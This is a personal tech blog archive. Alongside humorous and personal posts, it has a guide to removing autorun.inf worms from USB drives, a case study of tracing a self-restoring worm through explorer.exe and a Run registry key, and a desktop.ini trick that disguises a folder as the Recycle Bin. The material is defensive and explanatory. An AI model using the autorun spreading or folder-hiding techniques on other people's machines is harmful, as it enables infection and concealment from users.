“My son this is not the time to sleep, this is the time to exercise, to keep yourself fit, to work out, to play…” I looked at him, “What are you saying dad?? Exercise?? Play?? I come to Goa so that I can escape the monotonous and hectic life of Bangalore and sleep peacefully, and you wake me up at 4:00 in the morning, no prior warnings, nothing, and half expect me to exercise?? What’s got into you?” I wasn’t rude, but was satisfied that I had put my point across firmly. I thought that this argument would silence him. “Son, my dear son you do not understand. You are naive. Your company is manipulating you. You don’t have to worry about Internet and Web Security, there are loads of people out there who can take care of that. I understand it sounds all cool to be called a Hacker, but son you do not see the long term consequences that your job might offer you.” I looked at him mouth open, with an absurd expression. He had found 4:00 AM as a convenient time to express his opinion about my career?? I slumped on the chair nearest to me and looked at him. He took it as a cue to continue. “There are bigger things out there. What all do you expect to do with your salary, that does not even suffice your needs back there. Times are changing son, and it’s in the books that you have to flow with time.” I still couldn’t see where he was going. I didn’t protest this time, but looked at him awe struck allowing my pupils to dilate and stare beyond him. “So dad, what do you want me to do? Tell me quickly so that I can find some of my lost sleep.” I didn’t want to look at my bed. My skin crawled with nostalgic memories of the soft feel of my bed, pillow, the sheets and my pyjamas… “I have a gift for you” he suddenly announced. I wondered what it could be. Was silently hoping it would be Raymond Chen’s The Old New Thing or Harry Potter and The Deathly Hallows in hardcover. “Go, freshen up first, we have a long morning ahead.” It was less of a request and more of an order. I reluctantly obeyed.

The hands obscenely gestured 4:35 on my wrist watch by the time I was ready. I took a last loving longing look at my soft bed, the pillows, the sheets and my inside out pajamas, locked my room and walked down to the living room. Both my brothers had already donned tracks, tees and sports shoes and were smiling triumphantly. The whole house had gone mad, I presumed, I looked appealingly towards my brothers, who just smiled stupidly. I missed my mother. Wished I could teleport to Mumbai, to my cousins, and sleep there, in her lap. That Jumper guy was fabulous. I was shaken out of my psionic stupor when my dad called out to me and placed a long heavy object concealed inside a thick plastic covering, in my hands. I looked down at it. With my brothers gasping and ooohh-ing in the background, I pulled the object from the depths of the cover just like Hrithik Roshan pulling out his sword out of the scabbard in Jodha Akbar. There I was holding a gleaming willow bat!! I ricocheted under the shock and irony of the whole situation. My dad wanted us to play cricket at this unearthly hour. What next?? I stood there, emotions of mutiny rising from every inch of my body. My youngest brother let out a war whoop similar to the one George of the Jungle lets out occasionally in well, George of the Jungle. “Dad, for all my forsaken years that I have lived, I haven’t played cricket. I haven’t even been on a pitch. For God’s sake I haven’t even lifted a bat before!!!” My father calmly replied, “Of course you have lifted a bat before. Don’t you remember when Santosh’s dog had chased you?? I could vaguely recollect that incident that had happened 3 years ago. But I had used the bat defensively, that to on to the dog for heaven’s sake. And I remember missing the animal by miles. “Dad I couldn’t hit a Labrador with this” I said lifting the bat “do you expect me to hit a ball?? That too when it’s thrown at me at 60 odd mph!!!” I swear I could hear my brothers making fun of me. My father was nevertheless adamant. And pushed us out. I had never seen my brothers happier then this. I walked in silence holding the bat over my shoulders like a mace. It was almost dawn now. The place where I live is beautified by the silence it envisages occasionally to be broken by the chirping of birds or kids playing Ring a Ring o’ Roses…

I opened the gate to my house, with my brothers tearing off in short sprints across the lawn to the common ground that we shared with 24 other houses in the locality. I was surprised to see the ground crowded with people. Kids of all ages and sizes. I saw several familiar faces. There were even mothers feeding sandwiches (or something similar) to their wards while they wielded bats. India is gone crazy I thought. I stood there watching everybody, the tantrums that some were throwing on becoming out. I was even surprised to see Nikita standing beautiful as ever, a pretty girl I vied for when I was in college.

Somebody tapped on to my shoulders from behind. I turned around to see another cricket enthusiast in complete field attire. He put forth his glove wrapped right hand. Out of instinct and base sanity I shook his hand and helloed him back. At this he removed his heavy, constricting looking helmet. I faltered where I stood. There stood Imran, a renowned bully and my brother’s old pal. Having strict parents were no consolation to him. I remember how the entire locality would stand in their balconies at precisely 9:45 on the Saturday that our results were declared when in school just to see his reddened report card fly out of his balcony and land on the road below. Then came the usual hollow “Aai ga, no dad I’m sorry… agli baar aise nahi hoga… sorry dad sorry… aaaaaaaaahhhh.” The tortures by his parents were constant reminders to us. He was bad, no, bad would be a mild word, disastrous would better define it, at studies. He was already 17 and was still to appear his 10th Standard Exams in March. My friends said he was caned every night before going to bed just because he didn’t study and played a lot… Those stories would send shivers down my spine and God knows where else. But today he appeared vibrant and fresh. I searched for words to console his condition and to put some sense into his big fat head. Before I could speak, he asked me “Bhai for how many days are you going to be here??” I was defensive on that. I thought what were his ulterior motives involved. I wasn’t related to him or his dealings in any sort of way. The truth would be harmless I assumed. “Another 2 days probably” I replied. “How come you are out playing today? I thought your parents forced you to study and stuff.” I tried to look as innocent as possible, but with my drowsy eyes and lopsided body it wasn’t easy. He smiled at the question and delightedly replied “I don’t know what got into my father yesterday. He went and bought me a full cricket kit and asked me to play as much as I want. Wants to make a Dhoni out of me. Told me I could grow my hair as long as I wanted.” I wanted to laugh at him, but considered my situation; I too was in the same boat. He donned back his helmet and gestured me to come along.

My brother, it so happens, is pretty well known in the local fraternity. Kids kind of rally around him. I wasn’t surprised though with him being good friends with Imran. I walked to the end of the pitch and sat down on the grass boundary behind the wicket while my brother gave orders to 12 or so other kids. I had just started to visualize myself in my bed back at home when suddenly two pairs of arms lifted me off the ground and somebody pushed a helmet onto my head. Gloves were thrust into my hands, I looked around for help and noticed around ten boys, several of them my age standing looking at me. I imagined myself with a helmet and gloves on, must have looked funny because most of the boys snickered at me. Nikita too let out a gasp at seeing me on the ground probably realizing I wasn’t meant to be there. My brother came forth and pushed my new bat into my shivering hands and directed me towards the wicket. I faltered. God was this The End. Could it all be happening?? Give me a hundred application modules to write in Visual Basic, I’ll do it. Ask me what the full name of Albus Percival Wulfric Brian Dumbledore is, I’ll tell you. Order me to check some Russian Banking website for SQL Injection and Cross-Site Scripting, I’ll gladly do it, Ask me to parse Nessus XML files using C# and .NET and create Database Insert statements, I’ll really really do it… but don’t let me go on the pitch… please God… please…

I walked with all my courage, I’ll be honest I didn’t have any, to the pitch. A sudden silence had fallen over the place. I turned to look at Nikita, she was standing with her hands folded looking upwards expecting Gabriel to intervene. I faked a smile at her, even though she wasn’t looking at me. Her beautiful eyes were closed, I assumed she was praying or she did not have the heart to see me hit by a projectile moving over 60 mph. I turned around to see who was going to bowl me over. I wished I hadn’t seen him. It was a boy over 6 feet tall, heavily built and almost bald. Those dudes from Resident Evil looked milder. I gulped the last ounce of strength I had. Time seemed to slow down. Voices went all hoarse and electrified. A droplet of sweat from my forehead appeared to defy gravity and fall the length to the ground in what seemed like eternity. The bowler rushed up with all his speed, even in slow-mo he was faster then usual. It was then I realized I hadn’t worn my guard!! I panicked and dropped my bat and raising my right hand signaling the bowler to stop and with the left covering my possessions. Too late. The ball came at the speed of light and whhhhhhhhhhhaaaaaaaaaaammmmm…

I woke up with a scream… I felt around my bed and body sweating profusely. My room mate woke up with my cry and put on the lights wondering whether I had seen Jigsaw or Lord Voldemort himself. I returned to my senses. One scary nightmare that was. Damn the IPL, damn the cricketers, damn the auction and damn 20Twenty. I’m happy doing what I do. My room mate wore a concerned expression. I looked at him and smiled and giving no explanation told him to sleep. Poor chap he hasn’t slept the whole of last week. His parents want him to come down to Goa for the annual State Cricket Selections threatening him with dire consequences if he refuses. I identified my nightmare with his reality. Hope he and his family survives his appraisal in one piece. Then I turned around and went back to warmth of my soft bed, the sheets, the pillow and my pajamas.

USB Drives and the Autorun.inf

2009-07-09T05:38:00.000-07:00

USB drives have made our lives so much easier. You can move data between computers and store large files with ease for long term usage. Virus writers didn’t want to lag behind and they saw this as the perfect channel for distribution of malicious files. Worms, viruses, trojans and other malicious files cause more damage if the infected system is able to proliferate copies of the malicious files and distribute them to other systems either with the help of users or through other programmed actions.

Most computer users who have used a removable drive have come in contact with a malicious file (virus, worm or trojan) residing on their. Normally an antivirus on the system should be able to detect and clean the infection, but often the drive remains infected. It then comes down to the user to be able to detect and delete an infected file on the drive manually.

Most malicious files that reside on the USB drive infect your computer when the user open the removable drive via My Computer or when the default action is performed via the Windows AutoRun feature. Even merely double clicking on the drive can cause a system to get infected.

An autorun.inf file is a plaintext configuration file that resides at the root of a drive (Local hard drives, USB drives, CD-ROMs, DVDs etc) and contains information about the actions to do when a user performs the default action on the drive. The default action is the one that is set in bold in the right click context menu of the drive in My Computer (for any Windows object for that matter). For example the default action on a folder or a drive would be to Open the folder or drive. For a file it would be to open the file with the associated program. For the Local Area Connection Object in Network Connections it would be to show the Status of the connection.

An autorun.inf file normally contains the name of the file that has to be opened when the user performs the default action, which icon to use etc. You may have encountered legitimate autorun.inf files on CD-ROMs and DVDs. When you insert a CD-ROM containing software or game installation files (if AutoRun is enabled and if an autorun.inf file is present) the installation menu pops up allowing you to install the software. This executable is run automatically since Windows reads the autorun.inf file to find the name of the executable to be run, if any.

A simple autorun.inf file would contain the following:

[autorun]

Open=executable.exe

Icon=autorun.ico

Viruses go a step further in concealing their presence on the drive. They hide the autorun.inf file and the executable using the hidden and system attribute so that the file is not visible even after you ask Explorer to show hidden files. There are various ways to confirm the presence of an autorun.inf file in the root of your removable drive. The easiest would be to go to Start > Run > J:\autorun.inf where J is the drive letter for your USB drive. If notepad opens with the contents of the file then the file is obiviously present, else Windows will dsiplay a location unavailable error. The other method would be to open a command prompt instance and navigate to the drive and use the attrib command to see the attributes of the files in the root of the drive. If there is an autorun.inf file then you should be curious. If it has the S and H attribute set then you have to be suspicious.

Now that’s time consuming, some would say. I agree. Hence to ease my pain, I modified the right click menu of the drives using the Windows registry and added an option to view the attributes of files in the root of the drive.

Here’s how:

Open the Windows Registry Editor by going to Start > Run > regedit

Navigate to HKEY_CLASSES_ROOT\Drive\shell using the left hand side tree structure. Right click on shell and select New > Key. Name the key as anything you want. Right click on the Default value on the right hand side under the new key you just created and select Modify. Change the Value data in the text box provided to any string that you want to see in the right click menu of the drives. Click on OK.

Right click the new key that you created and create another key below it and name it to command. Double-click the Default value under the command key and type the following in the Edit String box that pops up:

cmd /k echo Showing File Attributes && pushd "%1" && attrib && type autorun.inf && echo . && pause && exit

Select OK and close the registry editor. If everything was done as explained above, then you should have another option in the right click menu of the drives in My Computer. The new option now created will allow you to see the attributes of the files and their names in the root of the drive and the contents of the autorun.inf file if it exists, without opening the drive itself. The command prompt window will close when any key is pressed.

As the autorun.inf file provides the name of the executable, you can easily delete it using the path from the autorun.inf file. If the executable also has the S and H attributes set then use attrib -s -h -r to remove the attributes and then a simple del would delete the file. You could then delete the autorun.inf file by removing its attributes through the command prompt and then deleting it using the delete command. Safely remove the USB drive and reinsert it to complete the task.

This Microsoft knowledgebase article provides an excellent procedure to disable autorun completely:

http://support.microsoft.com/kb/967715

USB removable drive cleaned, without an antivirus. Time for some coffee.

Update: Download the driveattrib.zip file using the link given below. Extract the driveattrib.reg file and double click it to add the contents to the Windows Registry to automate the entire process. Click on Yes when presented with a dialog box asking for confirmation.

Download the file here.

The Case of the Persistent Executable

2009-07-07T01:20:00.000-07:00

This is the first of the 2 case studies which won me a signed copy of Windows Internals, 4th Edition, by Mark Russinovich, Microsoft last year.

I woke up last Saturday around 11:00 in the morning to find my friend sitting at the computer typing some document in MSWord, he then minimized the document and proceeded to open the D: drive from My Computer. My usually fast Windows responded extremely slowly to the double click. I sat bolt upright in my bed and asked him to repeat the procedure with the other drives. The same delay was noticed on the other drives too. I then asked him to right click on any drive expecting a change in the context menu due to the presence of an autorun file. The menu was intact. I then got down and sat at the chair and used the attrib command at the prompt for each drive. This is what I got.

Certainly signs of malicious presence. I used the type command to read the contents of autorun.inf although I knew what it would point at.

I then immediately fired Process Explorer to see if the process was running. Failing to find the process or a handle to it, I then used the attrib –s –h –r fppg1.exe to reset attributes and proceeded to delete it using del fppg1.exe. I repeated the same procedure with the autorun.inf file. Since I have 6 partitions on my hard drive, I wrote a bat file, named it clean.bat and saved it in %systemroot% with the following contents.

@echo off
attrib -s -h -r fppg1.exe
del fppg1.exe
attrib -s -h -r autorun.inf
del autorun.inf
echo All done
echo.

I then ran clean.bat from the console on each partition. Happy that my system was back to normal, I restarted explorer to remove the effects of the autorun.inf file on the default open option on the drives. I then proceeded to open F: drive using the double click through My Computer. I was surprised to see the delay occurring again. The attrib command confirmed my doubts. The two files were back. I decided to dump the strings from the fppg1.exe file to see if I could find any clues. I ran the strings utility and piped the output to a text file called fppg1.text.

The file contained loads of ASCII characters and just three APIs that I recognized. That didn’t help much.

I then fired up Process Monitor to see what process was writing these files to disk. I used two filters with Path contains autorun.inf then include and Path contains fppg1.exe then include. I was surprised to see which process was writing, setting attributes and querying information.

It wasn’t only explorer.exe that drained my happiness out of me.

I then right clicked on Explorer to view its stack when IRP_MJ_CREATE Operation was performed. The stack had one unfamiliar entry.

I used the find handle or dll feature of Process Explorer to search for amvo0.dll. The returned results didn’t raise my spirits.

The dll had attached itself to other processes I had opened after restarting explorer. I then opened up cmd, changed to C:\Windows\System32\ and used the attrib command to confirm my suspicions about the attributes of amvo0.dll. I wasn’t disappointed.

I suspected that there could be an associated executable also present in the same directory and hence used attrib amv*. With my suspicions confirmed, I used strings.exe to dump strings from amvo.exe and did a file compare with fppg1.txt. Bingo! They were the same files in essence. The dll amvo0.dll was making explorer.exe and the system process to recreate the files fppg1.exe and autorun.inf whenever they were not found in the root of the drives. I used attrib again to remove the system and hidden attribute from amvo.exe and amvo0.dll and deleted amvo.exe through the command prompt. The file amvo0.dll was in memory and hence could not be deleted. One shortcoming of Process Explorer, I found would have really helped me, was to unload dlls which would have allowed me to delete the file immediately. I used autoruns.exe, another of Sysinternals creations, and found that amvo.exe created a registry entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run that caused it to be run at system startup. With the file gone, I restarted my system and then deleted amvo0.dll manually, fppg1.exe and the autorun.inf file using the bat file.

Case closed. I then went on to start my morning.

My Dream Phone

2009-06-26T04:14:00.000-07:00

It appears that the time to switch my phone has finally come. I use a Sony Ericcson Z555i with Gesture Control for my daily communication with the outside world. I also use a LG RD3500 Reliance Handset to speak to my girlfriend. As every phone enthusiast and feature loving geek would do, I set about to do some research to get my Sony Ericcson Z555i with Gesture Control replaced.

Finding a new phone is never hard if you know what you want in it. I have switched 3 phones over the past 2 years. The best being my current phone. But I recently noticed that it does not suit my persona. It does not have loads of features that would improve my life. Hell, I can’t even check my email on it. I have a list of things my phone should be able to do. Being a Windows fanatic, a Windows Mobile device would be ideal where I could write and test .NET applications. Internet and wifi connectivity with push email functionality would be mandatory and throw in some looks, sleek interface and respectable battery life. Not much, one would agree, in terms of features but hey I never said I wanted an IPhone.

I googled for smartphones and scrolled down the result page to see if anything was worth pursuing. It was then that I saw a news result that said Acer had launched three new phones. Acer? I thought Acer was into laptops. I know because I own a sleek Aspire 5920G [http://www.notebookreview.com/default.asp?newsID=3897] with 2.2 Ghz of Intel T7300, 4 GB RAM and a 360 GB hard drive. Apart from the curiosity, I happen to be pro Acer (now where have I heard that before, pro Google, pro Microsoft and now pro Acer? I need to delineate my loyalties.) and hence thought taking a look at the phone would not bulge my intentions.

The minute I checked the Acer website for the smartphone, I fell in love with the m900. It’s a sleek and stylish Windows Mobile device with several other features that I had always dreamt of having. I promised the deepest desires within me that I would someday proudly own this phone and flaunt it across the company where I work. I know that could be disadvantageous since doing that would brand me as a satisfied and well earning employee which would cause a sharp decline in my appraisals which obiviously I would not want.

I have yet to find out the prices which im sure will hinder the progress of my quest to own this baby. I can wait another month, and the month after that, and the month after that and the month after…

Convert normal folders to Windows Shell Folders

2009-06-18T12:28:00.000-07:00

I normally store all data in separate logical drives on my computer. My movie collection goes to a drive called Multimedia, so does the music. My code and office work goes to another drive called Office and my OS silently resides in my C drive. I have seen many people, and not just the technology illiterates, but even the tech savvy store sensitive data right on their desktop and in My Documents.

Nothing wrong with it, but if your system is used by multiple people; nosy in essesnce, you wouldn’t want your privacy to be breached.

The NTFS filesystem provides adequate protection to data via Access Control Lists, but that is another topic altogether. Playing around with System folders in Windows, I found that you could convert any folder to a system folder with the right desktop.ini file. Although later research showd me that this is an old trick, I was still fascinated by the sheer simplicity of it.

Shell folders are special Windows folders like My Computer, Recycle Bin and My Network Places. I wouldn’t go in to the math of why it works the way it works, but rather just show you how you could keep all your data inside a folder, convert it to the Recycle Bin and keep it on your Desktop and nobody would suspect there was data in it.

Here's how:
1. Create a folder called "Secret" on your desktop and copy some files to it.

2. Open notepad [Start > Run > notepad] and type the following exactly as shown:

[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}

3. Save the file as desktop.ini in the Secret folder on the desktop. Select "All Files" under "Save as type" in the Save As dialog of notepad and type the name of the file as desktop.ini

4. Open command prompt by going to Start > Run > cmd

5. Navigate to the directory containing your "Secret" folder, this would be the desktop in this example, using the cd command.

6. Type "attrib +S Secret" at the prompt and press Enter.

7. Navigate to your desktop and find your folder containing your precious cargo converted to the Recycle Bin. View the properties of the folder to find the Recycle Bin properties pop up.

8. Open it to find the contents of the Recycle Bin instead of your data.

This happens because Windows finds the desktop.ini file in the folder and the System attribute on the folder. Windows then reads the desktop.ini file to find the Class Identifier [CLSID] for Recycle Bin, which is {645FF040-5081-101B-9F08-00AA002F954E}. Your data is present in the folder but not accessible to Windows because the Windows Directory Enumeration APIs detect the folder as the Recycle Bin and not a file folder.

To get your data back, just open command prompt and enter the attrib –S Secret folder after navigating to the Desktop to remove the System attribute on the folder.

There are plenty of shell folders around Windows, but the most frequent ones that I use are the following with their CLSID values, just replace the CLSID values in the desktop.ini file:
My Computer: {20D04FE0-3AEA-1069-A2D8-08002B30309D}
Recycle Bin: {645FF040-5081-101B-9F08-00AA002F954E}
My Network Places: {208D2C60-3AEA-1069-A2D7-08002B30309D}

To automate the entire process, I wrote a simple tool called FolderCloak that just allows you to do the above with a nice GUI interface. You can download FolderCloak [and my other tools] at http://riyazahemed.webng.com

The Sound of Music at Central Station Antwerp (Belgium)

2009-06-17T13:26:00.000-07:00

Picture this: Around 200 people on a railway station, seemingly in their own worlds, laughing, walking, squatting, talking and all the other things that being humans we do. And then the “Do Re Mi song” (Maria’s Song from the Sound of Music) starts playing on the station’s speakers which causes these seemingly common people, utterly unbeknownst to each other, completely oblivious to their thoughts come together and perform a four minute dance completely synchronized to the last step.

I don’t care if it was shot as a publicity stunt for a reality show in Belgium, I don’t care if the people on the Antwerp Station were all paid to dance nor do I care if they had just 2 well choreographed rehearsals. Hell Its awesome!!

What I care about is how I managed to smile after having a tough day at office, about how I connected with the people, with the glow on their faces, with the sheer elation that the twinkling eyes expressed (although I couldn’t see them, I felt them) and the child in every single soul in that building..

I was amazed that there are things like swine flu, nuclear weapons, global warming, spontaneous human combustion, the lochness monster, cancers, my shady neighbors and drugs on this planet. Well these things can wait for 4 minutes.. I say go ahead and watch the video.. I’ll just hum along..

Doe, a deer, a female deer
Ray, a drop of golden sun
Me, a name I call myself
Far, a long, long way to run
Sew, a needle pulling thread
La, a note to follow Sew
Tea, a drink with jam and bread
That will bring us back to Do (oh-oh-oh)

My first post!!

2009-06-16T14:08:00.001-07:00

#inlcude <stdio.h>

#include <conio.h>

int main()

{

clrscr();

printf("My first post!!");

getch();

return 0;

}

Well I finally jumped the bandwagon... Was wondering how long I would be able to escape the blob.. oh.. ah.. typo there.. the blog effect. Its 2:42 AM here in Bangalore, the 17th of June 2009 (oh is it already huh??), nice time to begin blogging.. Its weird though that when I powered on my laptop an hour ago, I had never thought I would be writing.. Such is Life..

I stare at my laptop screen with shrivelled eyes, my pupils constricting under the strain of my day's work.. I go on.. Come on! Its my first post I say.. Need to write something meaningful so that my kids (when I have them and when they are able to blog) can proudly show their friends what their super-dad had written this fateful night..

I thought there were other things in life people cared about..

Feeling too sleepy, should retire before my fingers start typing gibberish.. I cant bear that on my blog.. atleast not on my first post..

Good night..